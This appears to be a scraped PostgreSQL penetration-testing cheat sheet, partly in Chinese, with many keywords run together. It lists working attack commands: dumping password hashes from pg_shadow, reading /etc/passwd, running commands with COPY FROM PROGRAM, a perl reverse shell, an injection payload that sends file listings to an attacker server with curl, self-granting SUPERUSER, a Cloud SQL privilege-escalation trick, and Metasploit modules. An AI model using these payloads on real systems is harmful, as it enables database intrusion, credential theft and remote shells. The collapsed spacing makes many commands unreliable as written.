psql-U<myuser># Open psql console with userpsql-h<host>-U<username>-d<database># Remote connectionpsql-h<host>-p<port>-U<username>-W<password><database># Remote connection
psql -h localhost -d <database_name>-U <User> #Password will be prompted\list # List databases\c <database> # use the database\d # List tables\du+ # Get users roles# Get current userSELECT user;# Get current databaseSELECT current_catalog;# List schemasSELECT schema_name,schema_owner FROM information_schema.schemata;\dn+#List databasesSELECT datname FROM pg_database;#Read credentials (usernames + pwd hash)SELECT usename, passwd from pg_shadow;# Get languagesSELECT lanname,lanacl FROM pg_language;# Show installed extensionsSHOW rds.extensions;SELECT*FROM pg_extension;# Get history of commands executed\s
# Get users roles\du#Get users roles & groups# r.rolpassword# r.rolconfig,SELECTr.rolname,r.rolsuper,r.rolinherit,r.rolcreaterole,r.rolcreatedb,r.rolcanlogin,r.rolbypassrls,r.rolconnlimit,r.rolvaliduntil,r.oid,ARRAY(SELECT b.rolnameFROM pg_catalog.pg_auth_members mJOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)WHERE m.member = r.oid) as memberof, r.rolreplicationFROM pg_catalog.pg_roles rORDER BY1;# Checkif current user is superiser## If response is"on"then true, if"off"then falseSELECT current_setting('is_superuser');# Trytogrant access to groups## For doing this you need to be adminon the role, superadmin or have CREATEROLE role (see next section)GRANT pg_execute_server_program TO"username";GRANT pg_read_server_files TO"username";GRANT pg_write_server_files TO"username";## You will probably get this error:## Cannot GRANTon the "pg_write_server_files"rolewithout being a member of the role.# Create new role (user) as member of a role (group)CREATEROLE u LOGINPASSWORD'lriohfugwebfdwrr'IN GROUP pg_read_server_files;## Common error## Cannot GRANTon the "pg_read_server_files"rolewithout being a member of the role.
表格
# Get owners of tablesselect schemaname,tablename,tableowner from pg_tables;## Get tables where user isownerselect schemaname,tablename,tableowner from pg_tables WHERE tableowner ='postgres';# Get your permissions over tablesSELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;#Check users privileges over a table (pg_shadow on this example)## If nothing, you don't have any permissionSELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';
函数
# Interesting functions are inside pg_catalog\df * #Get all\df *pg_ls* #Getby substring\df+ pg_read_binary_file #Check who has access# Get all functions of a schema\df pg_catalog.*# Get all functions of a schema (pg_catalog in this case)SELECT routines.routine_name, parameters.data_type, parameters.ordinal_positionFROM information_schema.routinesLEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_nameWHERE routines.specific_schema='pg_catalog'ORDER BY routines.routine_name, parameters.ordinal_position;# Another aparent optionSELECT*FROM pg_proc;
# Before executing these functiongoto the postgres DB (notin the template1)\c postgres## If you don't do this, you might get "permission denied" error even if you have permissionselect * from pg_ls_dir('/tmp');select * from pg_read_file('/etc/passwd', 0, 1000000);select * from pg_read_binary_file('/etc/passwd');# Check who has permissions\df+ pg_ls_dir\df+ pg_read_file\df+ pg_read_binary_file# Try to grant permissionsGRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;# By default you can only access files in the datadirectorySHOW data_directory;# But if you are a member of the group pg_read_server_files# You can access any file, anywhereGRANT pg_read_server_files TO username;# Check CREATEROLE privilege escalation
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
示例执行:
#PoCDROPTABLEIFEXISTScmd_exec;CREATETABLEcmd_exec(cmd_outputtext);COPYcmd_execFROMPROGRAM'id';SELECT*FROMcmd_exec;DROPTABLEIFEXISTScmd_exec;#Reverse shell#Notice that in order to scape a single quote you need to put 2 single quotesCOPYfilesFROMPROGRAM'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
# Access toexecute commandsGRANT pg_execute_server_program TO username;# Access toread filesGRANT pg_read_server_files TO username;# Access to write filesGRANT pg_write_server_files TO username;
COPY (select'') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
这通常是因为 pg_hba.conf 文件中的以下行:
# "local" is for Unix domain socket connections onlylocal all all trust# IPv4 local connections:hostallall127.0.0.1/32trust# IPv6 local connections:hostallall::1/128trust
CREATETABLEtemp_table (datatext);CREATETABLEshell_commands_results (datatext);INSERT INTO temp_table VALUES ('dummy content');/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */CREATE OR REPLACEFUNCTIONpublic.suid_function(text) RETURNStextLANGUAGEsql IMMUTABLE AS'select ''nothing'';';CREATEINDEXindex_maliciousON public.temp_table (suid_function(data));ALTERTABLE temp_table OWNERTO cloudsqladmin;/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */CREATE OR REPLACEFUNCTIONpublic.suid_function(text) RETURNStextLANGUAGEsql VOLATILE AS'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';ANALYZE public.temp_table;
一些配置错误的 postgresql 实例可能允许任何本地用户登录,可以使用 dblink function 从 127.0.0.1 本地登录:
\du * # Get Users\l # Get databasesSELECT*FROM dblink('host=127.0.0.1port=5432user=someuserpassword=supersecretdbname=somedb','SELECT usename,passwd from pg_shadow')RETURNS (result TEXT);
请注意,之前的查询要正常工作需要存在函数 dblink。如果不存在,您可以尝试使用创建它。
CREATE EXTENSION dblink;
如果您拥有具有更高权限的用户的密码,但该用户不允许从外部 IP 登录,您可以使用以下函数以该用户的身份执行查询:
SELECT*FROM dblink('host=127.0.0.1user=someuserdbname=somedb','SELECT usename,passwd from pg_shadow')RETURNS (result TEXT);
可以通过以下方式检查此函数是否存在:
SELECT*FROM pg_proc WHERE proname='dblink'AND pronargs=2;
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
logging
在 postgresql.conf 文件中,您可以通过更改来启用 postgresql 日志:
log_statement='all'log_filename='postgresql-%Y-%m-%d_%H%M%S.log'logging_collector=onsudoservicepostgresqlrestart#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/#or in /var/lib/postgresql/<PG_Version>/main/pg_log/